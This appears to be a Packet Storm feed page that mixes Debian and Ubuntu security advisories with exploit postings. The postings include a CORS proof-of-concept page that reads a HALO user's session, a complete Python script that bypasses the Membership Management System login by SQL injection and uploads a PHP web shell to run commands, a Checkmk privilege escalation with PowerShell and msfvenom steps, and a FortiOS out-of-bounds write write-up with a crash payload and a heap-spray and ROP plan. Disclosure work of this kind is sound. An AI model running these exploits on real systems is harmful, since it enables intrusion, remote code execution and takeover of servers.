Debian Linux Security Advisory 5640-1 - Two vulnerabilities were discovered in Open vSwitch, a software-based Ethernet virtual switch, which could result in a bypass of OpenFlow rules or denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5640-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 14, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openvswitchCVE ID         : CVE-2023-3966 CVE-2023-5366 Debian Bug     : 1063492Two vulnerabilities were discovered in Open vSwitch, a software-basedEthernet virtual switch, which could result in a bypass of OpenFlowrules or denial of service.For the oldstable distribution (bullseye), these problems have been fixedin version 2.15.0+ds1-2+deb11u5. This update also adresses a memory leaktracked as CVE-2024-22563.For the stable distribution (bookworm), these problems have been fixed inversion 3.1.0-2+deb12u1.We recommend that you upgrade your openvswitch packages.For the detailed security status of openvswitch please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openvswitchFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXy+NgACgkQEMKTtsN8TjasEQ//V4q2/qeHlZk+Sr/73jLvDOA7u6O+FxGGi+LHBiYIoUlD+E2jEq/pAzaK/hlpHCKO1g5bkf7/TcA9TaMyxo498LmT6/TX6SNB+lxOcJQlS8KyT/JtNQt31nk4LND1IU/WFliMdNQoqwYgZVp6innCmb2hTYcxTKeGeQndnaTRIGo/FShxgCBZHwOJKB39eg0hQCDgx1DzfkA0e9u/I7Vq4MKEitV5u1H+Uf9embZaUsfwJCSaeshuxmp4U20r2V9hxXVYrhAeFWYGiDEY+Di4O9fDOVLw2An19ncQjDquLfRYqdys8AMxzi3+Vm0VasMAmZlEhdjcSjtotMI3tjgLcWGOz8BGdBUTAKK0FMtzPHLMhjfJ/cpC6jxZ19ZJcD3OUDIA6nf4CZjW4BOCImukqm9EUJtcQFZAGONdkelNYiz6V5R6IpbAVtLPVkx5yyWWEPXau6eZKhKO0aMcBiAGUYs2LI0rmrmPBdTtQcZJmTx7U+jZiPO6Dx0YP5DMwY23Z8GWPZeDX/2C8HBPqAMKfsWzIOEcXJ0HlAnVyJnC7XGBb+q4W+RFDWhcXYbi40SyyHrDqYBg/ne7WxEnmzfMk3F9cqRCn+owV2lbYxYRKIDZngyg2JK3sdjMUfnFE+5D8QRvxQQMYM9H8q3iBzR1KVEi6cpUUoTZCz6qI5rcH6E==ZEHS-----END PGP SIGNATURE-----

Debian Security Advisory 5640-1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Faraday 5.2.0

HALO version 2.13.1 has an insecure cross-origin resource sharing setting that allows an arbitrary origin.

## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted  
## Author: nu11secur1ty  
## Date: 03/15/2024  
## Vendor: https://www.halo.run/  
## Software: https://github.com/halo-dev/halo  
## Reference: https://portswigger.net/web-security/cors

## Description:  
The application implements an HTML5 cross-origin resource sharing  
(CORS) policy for this request that allows access from any domain.  
The application allowed access from the requested origin null  
The application allows two-way interaction from the null origin. This  
effectively means that any domain can perform two-way interaction by  
causing the browser to submit the null origin, for example by issuing  
the request from a sandboxed iframe or malicious fishing domain with a  
specially crafted HTML exploit.

STATUS: HIGH- Vulnerability

[+]Exploit:  
```HTML  
<html>  
<body>  
<center>  
<h2>CORS POC Exploit  
<h3>Extract SID

<div id="demo">  
<button type="button" onclick="cors()">Exploit Click here  
</div>

<script>  
function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {  
if (this.readyState == 4 && this.status == 200) {  
document.getElementById("demo").innerHTML = alert(this.responseText);  
}  
};  
xhttp.open("GET",  
"http://192.168.100.49:8090/apis/api.console.halo.run/v1alpha1/users/-",  
true);  
xhttp.withCredentials = true;  
xhttp.send();  
}  
</script>

</body>  
</html>

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/HALO/2024/HALO-2.13.1)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/halo-2131-cross-origin-resource-sharing.html)

## Time spent:  
00:25:00

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

HALO 2.13.1 CORS Issue

Membership Management System version 1.0 suffers from remote shell upload and remote SQL injection vulnerabilities.

from requests_toolbelt.multipart.encoder import MultipartEncoder  
import requests  
import string  
import random  
import os

# ========================================================================================================

# Application: Membership Management System  
# Bugs: SQL injection + Insecure File Upload = Remote Code Execution  
# Date: 14.03.2024  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://codeastro.com/author/nbadmin/  
# Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/  
# Version: 1.0  
# --------------------------------------------------

# Vulnerability Description:

# The sql injection vulnerability was found in the file `Membership-PHP/index.php`

# The login page located at MembershipM-PHP/index.php contains a SQL Injection vulnerability.   
# This vulnerability allows attackers to inject malicious SQL code into the input fields used to provide login credentials.   
# Through this exploit, unauthorized users can gain access to sensitive data or even take control of the system.

# Vulnerable Code Section:

# $email = $_POST['email'];  
# $password = $_POST['password'];  
# $hashed_password = md5($password);  
# $sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";

# The Insecure File Upload vulnerability appeared in this file `MembershipM-PHP/settings.php` 

# The MembershipM-PHP/settings.php file contains an insecure file upload vulnerability.   
# This allows attackers to upload unauthorized files to the server and potentially execute remote code execution (RCE) attacks.

# Vulnerable Code Section:

# if (isset($_FILES['logo']) && $_FILES['logo']['error'] === UPLOAD_ERR_OK) {  
#     $logoName = $_FILES['logo']['name'];  
#     $logoTmpName = $_FILES['logo']['tmp_name'];  
#     $logoType = $_FILES['logo']['type'];  
#     $uploadPath = 'uploads/';

#     $targetPath = $uploadPath . $logoName;  
#     if (move_uploaded_file($logoTmpName, $targetPath)) {

#         $updateSettingsQuery = "UPDATE settings SET system_name = '$systemName', logo = '$targetPath', currency = '$currency' WHERE id = 1";  
#         $updateSettingsResult = $conn->query($updateSettingsQuery);

#         if ($updateSettingsResult) {  
#             $successMessage = 'System settings updated successfully.';} else {  
#             $errorMessage = 'Error updating system settings: ' . $conn->error;}} else {  
#         $errorMessage = 'Error moving uploaded file.';}}

 # --------------------------------------------------

# reference : https://sospiro014.github.io/Membership-Management-System-RCE  
# I created the python code used in the exploit by looking at this https://www.exploit-db.com/exploits/50123 source and modifying it

# ========================================================================================================

# generate random string 8 chars  
def randomGen(size=8, chars=string.ascii_lowercase):  
    return ''.join(random.choice(chars) for _ in range(size))

# generating a random username and a random web shell file  
shellFile = randomGen() + ".php"

# creating a payload for the login  
payload = {  
    "email": "test@mail.com' or 0=0 #",  
    "password": "a",  
    "login": ""  
}

session = requests.Session()

# changeme  
urlBase = "http://172.17.86.197/" # change this target ip :)

# login  
url = urlBase + "index.php"  
print("=== executing SQL Injection ===")  
req = session.post(url, payload, allow_redirects=False)

# check if 'Set-Cookie' header is present in the response  
if 'Set-Cookie' in req.headers:  
    cookie = req.headers["Set-Cookie"]  
    print("=== authenticated admin cookie:" + cookie + " ===")  
else:  
    print("Set-Cookie header not found in the response.")  
    exit()

# upload shell  
url = urlBase + "settings.php"

# Get user input for the command to execute  
cmd_input = input("Enter the command to execute: ")

# PHP code to execute the command received from the user  
php_code = "<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>"

mp_encoder = MultipartEncoder(  
    fields={  
        "systemName": "Membership System",  
        "currency": "$",  
        "logo": (shellFile, php_code, "application/x-php"),  
        "updateSettings": ""  
    }  
)

headers = {  
    "Cookie": cookie,  
    'Content-Type': mp_encoder.content_type  
}

print("=== login user and uploading shell " + shellFile + " ===")  
req = session.post(url, data=mp_encoder, allow_redirects=False, headers=headers)

# curl the shell for test  
requestUrl = "curl " + urlBase + "uploads/" + shellFile + "?cmd=" + cmd_input  
print("=== issuing the command: " + requestUrl + " ===")

print("=== CURL OUTPUT ===")  
os.system(requestUrl)

Membership Management System 1.0 SQL Injection / Shell Upload

Debian Linux Security Advisory 5639-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5639-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonMarch 13, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-2400Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), this problem has been fixed inversion 122.0.6261.128-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXx7LIACgkQZF0CR8NudjcWZA/9E8Fv7qz1xdAfgt/f8Iueu24Ct3n2/0yIvZ7GZCEHhyeU7jPaieh3LKL2HIvafH9UWOlU643jHefoX4xQVos3uc8VuXjBAfX0AJrRl0N0JR4am7EpbKJ/WkQjSqpklh9QFbm+0g5iKbhWVA3KI+IZ8wkx/g4QUxYpmF2Pou6xZWIr3RkWX0T2x/Bb4nG9CrVOwQg5BltP6jPln269sU/5Olr6VL3S4KN+1CdBySmXrrhKVsxpbi7qLa9d+czGAjYhAp/2YGCEz67Ib55n/1mhaCL7fqU2cZHBdwqYjTBJqOnsGVJSm8Q7hbJ2i7SaETJkk9oVYIN8XUw2xzdONGS44Xd/rhUesJzsfduYNSD+Yhq+AhqKmxGILshMC+Vz6elNGgG7mKaUwj7/6FtN6VmP0jiVbHMLRpH1ROvph2uENUQYPE/slfkYluNhPTU4BefBnGghyfj6E9HBV3AjWTR/EmsrMUF9+kbs6AEwVlAiVArJorQ63kbRQ5KXFdvJnQ22XDztR+zWwfS5QhQAyEmpdhO/UoFfVyhWnzbfolEUkEmv/MlTFndCoiYWErmqpXLui7Iq66rEgjLJHv2V8s6jJvsT6a75XdjRCaZkCKab/f/pCI6xLZtn2JhL6LkGeY2qpmZOsEwieBbVvsix6ysmmmXIinEmE7Ckf66ENs7TKZw==RmDM-----END PGP SIGNATURE-----

Debian Security Advisory 5639-1

Checkmk Agent versions 2.0.0, 2.1.0, and 2.2.0 suffer from a local privilege escalation vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20240307-0 >  
=======================================================================  
               title: Local Privilege Escalation via writable files  
             product: Checkmk Agent  
  vulnerable version: 2.0.0, 2.1.0, 2.2.0  
       fixed version: 2.1.0p40, 2.2.0p23, 2.3.0b1, 2.4.0b1  
          CVE number: CVE-2024-0670  
              impact: high  
            homepage: https://checkmk.com  
               found: 2023-12-01  
                  by: Michael Baer (Office Fürth)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Checkmk 2.2 has arrived – and is ready to monitor your hybrid IT  
infrastructure with new features for monitoring native cloud applications,  
OpenShift support, an expanded REST API, UX improvements, enhanced  
integrations and over 174 new or reworked checks and agents. Monitor your  
cloud assets from top hyperscalers with Checkmk 2.2 in addition to the  
powerful monitoring of your on-premises networks and servers."

Source: https://checkmk.com/product/latest-version

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Local Privilege Escalation via writable files (CVE-2024-0670)  
In some cases, the software creates temporary files inside the directory  
C:\Windows\Temp that get executed afterwards. An attacker can leverage this  
to place write-protected malicious files in the directory beforehand. The files  
get executed by Checkmk with SYSTEM privileges allowing attackers to escalate  
their privileges.

Proof of concept:  
-----------------  
1) Local Privilege Escalation via writable files (CVE-2024-0670)  
In the first step, the filename that will be used by Checkmk needs to be found.  
The application creates temporary files with name cmk_{}_{}_{}.cmd. The  
placeholders are replaced with a string, the process id and a counter. The first  
string was always 'all' and the counter usually is 0. The process id is not  
exactly predictable. However, Windows assigns those numbers in increasing order.  
This allows to observe the currently used process ids and define a limited  
range of probable ids.

In the second step, the attacker places the malicious binary into the folder  
C:\Windows\Temp multiple times. The filenames are constructed using the above  
pattern for all different probable ids. After placing the files, the attacker  
marks them as read-only. Both can be automated using the following powershell  
command. Here, the range of probable ids was determined to be between 10000  
and 30000. The file C:\Users\attacker\Desktop\mal.exe is the malicious file.

10000..30000 | foreach {  
  copy C:\Users\attacker\Desktop\mal.exe C:\Windows\Temp\cmk_all_${_}_1.cmd;  
  Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;  
}

For this proof of concept, a binary was created using msfvenom that executes  
the command whoami and writes the result to a file. This will allow to verify  
the successful execution as the SYSTEM user. The following command was used:

msfvenom -p windows/exec CMD='cmd /c "whoami > C:\abc\file"' -f exe -o mal.exe

It should be noted, that the folder C:\abc has to exist and that the anti-virus  
solution must be disabled to execute this particular binary.

The final step is to force Checkmk to write and execute those temporary files.

It was observed that repairing the software is enough. This repair process can  
be initiated via the Windows GUI or using the following command. The name  
fafda3e.msi will be different on every system. The folder C:\Windows\Installer  
can be investigated to find the correct name on a given system.

msiexec /fa C:\Windows\Installer\fafda3e.msi

After the repairing finished, the file written by the malicious binary can be  
checked. It was created and contains the string "nt authority\system".  
[see figure checkmk_tempfolder.png]

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 2.1.0

According to the vendor, the following versions are affected:  
* 2.0.0  
* 2.1.0  
* 2.2.0

Vendor contact timeline:  
------------------------  
2024-01-15: Contacting vendor through security@checkmk.com  
2024-01-18: Vendor confirms vulnerability, assigns CVE, and  
             prepares a fix  
2024-01-26: Providing credits and acknowledging CVSS score.  
2024-03-04: Vendor informs us that fixes with Werk #16361  
             are available.  
2024-03-07: Coordinated release of security advisory.

Solution:  
---------  
Install the latest version 2.1.0p40 or 2.2.0p23 from the vendor's  
download page:

https://checkmk.com/download

More information can be found within the vendor's security advisory:  
https://checkmk.com/werk/16361

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Michael Baer / @2024

Checkmk Agent 2.0.0 / 2.1.0 / 2.2.0 Local Privilege Escalation

Vinchin Backup and Recovery versions 7.2 and below suffer from an authentication command injection vulnerability.

    CVE ID: CVE-2024-25228Title: Authenticated Command Injection Vulnerability in ManoeuvreHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and EarlierDescription:A critical security vulnerability has been discovered in the `getVerifydiyResult` function within the `ManoeuvreHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, intended for validating IP addresses or web resources, is vulnerable to authenticated command injection due to insufficient input validation and sanitization.Function Analysis:- The function accepts an input array `$params`, focusing on the `type` and `value` keys.- Based on the `type`, it attempts to validate the input using either `verifyPing` (for IP addresses) or `verifyWeb` (for web resources).- The vulnerability specifically lies in the `verifyPing` method, where the `exec` function is used to execute a `ping` command with the user-supplied `value`, without proper validation or sanitization.Exploitation Risk:Authenticated attackers can exploit this vulnerability by injecting malicious commands into the `value` parameter. When processed by the vulnerable function, these commands can be executed on the server, leading to unauthorized access or control.Current Status:As of the latest available information, no patch has been released for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery. The vendor has not acknowledged the vulnerability.Recommendation:Users are advised to apply strict access controls to mitigate the risk posed by this vulnerability until an official patch is released. Monitoring for any updates from Vinchin regarding this issue is also recommended.Discoverer: Valentin Lobstein

Vinchin Backup And Recovery 7.2 Command Injection

Ubuntu Security Notice 6673-2 - USN-6673-1 provided a security update for python-cryptography. This update provides the corresponding update for Ubuntu 16.04 LTS. Hubert Kario discovered that python-cryptography incorrectly handled errors returned by the OpenSSL API when processing incorrect padding in RSA PKCS#1 v1.5. A remote attacker could possibly use this issue to expose confidential or sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6673-2  
March 14, 2024

python-cryptography vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

python-cryptography could be made to expose sensitive information over the  
network.

Software Description:  
- python-cryptography: Cryptography Python library

Details:

USN-6673-1 provided a security update for python-cryptography.  
This update provides the corresponding update for Ubuntu 16.04 LTS.

Original advisory details:

  Hubert Kario discovered that python-cryptography incorrectly handled  
  errors returned by the OpenSSL API when processing incorrect padding in  
  RSA PKCS#1 v1.5. A remote attacker could possibly use this issue to expose  
  confidential or sensitive information. (CVE-2023-50782)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   python-cryptography             1.2.3-1ubuntu0.3+esm1  
   python3-cryptography            1.2.3-1ubuntu0.3+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6673-2  
   https://ubuntu.com/security/notices/USN-6673-1  
   CVE-2023-50782

Ubuntu Security Notice USN-6673-2

This post details the story and technical details of the non-secure Hypervisor-Protected Code Integrity (HVCI) configuration vulnerability disclosed and fixed with the January 9th update on Windows. This vulnerability, CVE-2024-21305, allowed arbitrary kernel-mode code execution, effectively bypassing HVCI within the root partition.

Hunting Down The HVCI Bug In UEFI

Fortinet FortiOS suffers from an out of bounds write vulnerability. Affected includes Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, and 1.0.0 through 1.0.7.

# CVE-2024-21762  
out-of-bounds write in Fortinet FortiOS  CVE-2024-21762 vulnerability 

Vulnerability  
=====

FortiGate released a version update in February, fixing multiple medium- and high-risk vulnerabilities. One of the severe-level vulnerabilities is an unauthorized out-of-bounds write vulnerability in SSL VPN. The vulnerability warning states that this vulnerability may be exploited in the wild. This article will introduce the author's analysis of the process of exploiting this vulnerability to achieve remote code execution.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/7f0e0f05-9d1b-4e4e-b877-646dc585f07a)

The environment used for vulnerability analysis in this article is `FGT_VM64-v7.4.2.F-build2571` 

diff   
======

Comparing the binaries of the repaired versions (7.4.2 and 7.4.3), the analysis found that the repair code is located in function `sub_18F4980`(7.4.2).

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a07f1ef5-5fc6-451b-9613-d1adbeb1e734)

Analyzing this function, it is not difficult to find that the logic of this function is to read the body data of the HTTP POST request. At the same time, Transfer-Encodingit is determined according to the request header whether to read in chunk format or based on Content-Lengthreading. According to the control flow graph comparison results, there are two code modifications:

When parsing the chunk format, call ap_getlinethe read chunk length and check ap_getlinewhether the return value is greater than 16. If it is greater than 16, it is considered an illegal chunk length.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/079c74e6-1302-42ce-bb83-519e11d9505b)

When reading the chunk trailer, the source of the written \r\noffset is `line_offthe` assignment source, `line_offthe` value before repair is from , and the return value after `*(_QWORD *)(a1 + 744)` repair is . `line_offap_getline`

Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/a11a4bea-7e45-4ec7-b63c-34f8dd0337c0)

Continuing to trace forward, `*(_QWORD *)(a1 + 744)` the value that can be found is the length of the chunk length field of the first verification.

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/63f92eaf-68f6-4d32-935b-0451e5da07dc)

At the same time, reading the code can tell that when the value of the chunk length field is 0 after hex decoding, it will enter the logic of chunk trailer reading.

Triggering out-of-bounds   
=========

After analyzing the patch, we can draw the following conclusions:

1. When parsing a chunk, if the hex decoded value of the chunk length field is 0, start reading the chunk trailer.  
2. After calling ap_getline to read the chunk trailer, it will be written to the buffer according to the length of the chunk length field `\r\n`.  
3.   
Therefore, if many 0s are passed in the chunk length field, and the length of 0s is greater than 1/2 of the remaining buffer length, an out-of-bounds write will be triggered \r\n. Through debugging, we can know that the target buffer is located on the stack `(function sub_1A111E0)` , and the return address is stored at offset 0x2028. If written at offset 0x202e `\r\n`, reta crash will occur due to an illegal address when the function returns to execute the instruction to resume rip.

Crash PoC:

```http  
pkt = b"""\  
GET / HTTP/1.1  
Host: %s  
Transfer-Encoding: chunked

%s\r\n%s\r\n\r\n""" % (hostname.encode(), b"0"*((0x202e//2)-2), b"a")

ssock = create_ssock(hostname, port)  
ssock.send(pkt)  
ssock.recv(4096)  
```

Crash scene:

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b948f525-bee9-4344-85c1-b1fce8d65acb)

By analyzing the cause of the vulnerability, it can be seen that the vulnerability can be used to write `\r\n` two bytes out of bounds on the stack, and the out-of-bounds range is close to `0x2000`. Since the written content is very limited, RCE cannot be achieved by directly hijacking rip. Therefore, you need to focus on the memory pointer saved on the stack.

failed attempt  
============

What is easier to think of is to hijack rbp and overwrite the low byte of rbp so that rbp just points to a controllable memory area. When the upper-level function returns to execute the instruction, rip can be completely hijacked. However, during verification, it was found that even if rbp on the stack is overwritten, rsp and rip cannot be hijacked, and the program will not even crash. Continuing to trace back up, we find the parent function . This function is not called to restore rsp when it returns , but directly , so it cannot achieve the expected effect. leave retsub_1A111E0sub_1A26040 leave retadd rsp, 0x18

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9097dd29-45a8-41c7-99be-eddd88308cce)

Find another breakthrough point  
======

As seen in the previous section, the function saves the values ​​of the five registers `rbx` and r12-r15 on the stack, and restores these registers when the function returns. Continue backtracking to find the parent function . You can see that what is saved in r13 is exactly the parameters `sub_1A26040sub_1A27650a1` .

a1 is a structure pointer. Through debugging, we can also see that a heap address is saved on the stack r13

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/8d419563-39f1-47b0-93b5-8f438cdecbf7)

If the memory in the red area in the figure is overwritten by out-of-bounds writing, then the r13 register is restored when the function returns, and the value of the pointer can be tampered with . If the heap memory can be laid out so that a1 points to a memory area arranged in advance, then the entire a1 structure can be hijacked. At the same time, through analysis of the code logic of and , there are a large number of dynamic function calls of a1 multi-level structure members, so there will be more opportunities to hijack **a1.sub_1A26040a1sub_1A27650sub_1A26040**

Hijacking a structure  
==============

According to the assumption, after the low byte of the a1 pointer is overwritten , it can point to the pre-arranged memory. as the picture shows: `\r\n`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/16ecb081-617e-42a6-b0d7-f009d0a235a3)

In order to achieve this effect, the following conditions need to be met:

The `a1` structure address is higher than the heap spray area address, and the gap between them is very small.  
`0x7fxxxxxxx0a0d` Must point to the forged structure.

Debugging can find that the size of the a1 structure is `0x730` . According to the alignment rules of jemalloc, a heap block of size `0x800` will be allocated. The 0x800 heap block is not commonly used during request processing, so it is easy to exhaust the `0x800` heap block in tcache, and at the same time apply for more new 0x800 blocks, so that they can enter tcache after release. Heap injection also selects heap blocks of uncommon sizes so that the newly applied heap blocks are continuous and close to the newly applied 0x800; heap injection chooses to use larger heap blocks to ensure that their addresses are aligned with 0x800, so that It is easy to ensure that the lower 12 bits of each forged structure address are 0xa0d; the heap spray range is not less than `0x10000` to ensure that it points to the heap spray area. The effect after hijacking is as follows: `0x7fxxxxxxx0a0d`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/4553bf2f-7590-4dcd-bd94-972465e7be5f)

Find exploitable multi-level pointers  
======================

Through the above operations, the hijacking of the a1 structure can be achieved. Combing through the code of function sum, there are many dynamic calls to the second-level pointer and third-level pointer of the a1 structure member, for example: `sub_1A27650sub_1A26040`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f9f65242-90dd-43ee-8fdb-95fa9059805e)

When `(0<N<5)` is satisfied , it will be called dynamically . Therefore, the member needs to be faked into a multi-level pointer, which ultimately points to the function we want to call. Since the target binary does not have PIE protection turned on, you can find qualified multi-level pointers in the target binary. Analyzing the binary, we can find that the first points to the GOT table address of the corresponding function.`*(_BYTE *)(a1+0x20*(N+6)+0x10)&6==0*(__int64 (__fastcall **)(__int64))(*(_QWORD *)(*(_QWORD *)(a1 + 0x298)+0x70)+0xC0)(a1)a1 + 0x298` 

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/9d274361-093b-4042-9c67-bd5083c8d888)

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/f27436b9-a3d1-4650-85d6-6117b57ad3a3)

Therefore, taking functions as an example, you can find qualified multi-level pointers **system**

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/3ca3f7d6-b416-4cf8-9c41-6f6eb1e79b0e)

During heap spraying, changing the value at offset 0x298 of the structure can be used to call the system function. The effect is as follows: `0x4368d0`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/c19cfc84-c3c3-43a5-909b-5d5eee935815)

As shown in the figure, the parameter of the dynamic call is exactly a1, and the memory pointed to is controllable. At this point, you can normally use the system function to execute any command. However, in FortiGate, the file does not have the ability to execute commands, so using the system function to execute commands cannot be executed successfully. `/bin/sh`

Hijack RIP  
============

Since the system function cannot execute commands, we can only find other ways to complete RCE. The existing condition is that any GOT table function can be called, and the memory pointed to by the first parameter of the function is controllable. Therefore, if there is a function in the GOT table that will call back a certain member of the parameter, there is a chance to achieve RIP hijacking. It’s easy to think of functions that were often used in previous FortiGate exploits . **SSL_do_handshake**

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/bc6aaf2a-9c58-4ade-9af0-ccadcc79274b)

You only need to construct the SSL structure so that the conditions are met and the final call is made to realize rip hijacking and hijack rip to 0xdeadbeef as shown in the `figure:s->handshake_func(s)`

![image](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/b3979820-893f-47e3-bd94-b63fa58a7bb7)

The FortiGate main program is an All-in-One binary with a size of over 70MB. There are a large number of gadgets that can be used. It is not difficult to implement RCE using ROP, so I won’t go into details.

### demo :

Although web mode is turned off by default in SSL VPN version 7.4.2 and browser access returns 403, this vulnerability can still be exploited in the default configuration.

![ezgif-6-c1d88c0511](https://github.com/h4x0r-dz/CVE-2024-21762/assets/26070859/0e8188fa-de85-4579-b932-924c0e54b334)

This vulnerability is similar to the heap overflow vulnerability caused by XOR last year . They are both seemingly useless overflow vulnerabilities. The exploitation process is more tricky and more like a CTF question. However, compared with traditional CTF problems that attack heap managers, real vulnerabilities require more context structures and code logic to be exploited. The author's level is limited. If there are any mistakes, please correct me.CVE-2023-27997

original post In Chinese : https://mp.weixin.qq.com/s?__biz=Mzk0OTU2ODQ4Mw==&mid=2247484811&idx=1&sn=2e0407a32ba0c2925d6d857f4cdf7cbb&chksm=c3571307f4209a110d6b28cea9fe59ac0f0a2079c998a682e919860f397ea647fa0794933906&mpshare=1&scene=1&srcid=0313EaETjGzEAvOdByUt6ovU#rd

Source

Packet Storm